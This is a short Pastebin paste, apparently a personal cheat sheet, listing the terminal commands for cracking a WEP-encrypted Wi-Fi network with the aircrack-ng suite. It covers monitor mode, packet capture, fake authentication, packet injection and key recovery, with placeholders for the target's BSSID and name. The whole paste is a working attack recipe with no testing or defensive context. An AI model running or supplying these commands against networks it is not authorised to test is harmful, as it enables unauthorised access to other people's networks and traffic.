Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- NETWORKMANAGER:
- sudo /etc/rc.d/networkmanager stop
- STARTING MON0:
- airmon-ng start wlan0
- TERM1:
- airodump-ng mon0
- airodump-ng -w wepcrack -c [channel] --bssid [bssid number] mon0
- TERM2:
- aireplay-ng -1 6000 -a [bssid] -e [router name] -h [my wireless mac] mon0
- TERM3:
- aireplay-ng -2 -b [bssid] -h [my wireless mac] -c FF:FF:FF:FF:FF:FF -p 0841 mon0
- TERM4: Data needs to hit about 30,000 from first terminal window
- aircrack-ng [filename].cap
- NOTES:
- no wlan0 interface should be up
- get wifi MAC with "ip link"
- compat-wireless drivers need to be installed for the injection to work
Advertisement
Add Comment
Please, Sign In to add comment